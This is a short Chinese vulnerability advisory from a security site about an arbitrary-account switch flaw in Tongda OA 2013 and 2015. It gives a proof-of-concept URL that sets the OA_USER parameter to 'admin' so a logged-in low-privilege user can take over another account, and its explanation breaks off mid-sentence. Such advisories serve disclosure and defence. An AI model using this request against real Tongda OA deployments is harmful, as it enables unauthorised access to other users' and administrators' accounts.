# 通达oa 任意账号跳转
===================
一、漏洞简介
————
需要登录
二、漏洞影响
————
2013、2015版本
三、复现过程
————
POC:
http://0-sec.org/interface/ugo.php?OA_USER=admin
通过控制OA\_USER参数进行任意⽤户的跳转,⽐如说你现在是个普通权限的⽤户,使用这个⻚面即可跳转到
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
相关推荐
作者
最近一周热门文章
1CVE-2025-55182 dify 无条件rce
2025年12月5日2会员手册版本更新(恢复md5解密功能)
2025年12月5日3普华科技PowerPms ForgotPassword 存在sql注入
2025年12月3日4XWiki Platform 文件读取 (CVE-2025-55749)
2025年12月4日5天地伟业Easy7 queryUserbyDesc 存在SQL注入
2025年12月4日6安全渗透测试报告模板.doc
2025年12月4日会员专属标签云
请登录后查看评论内容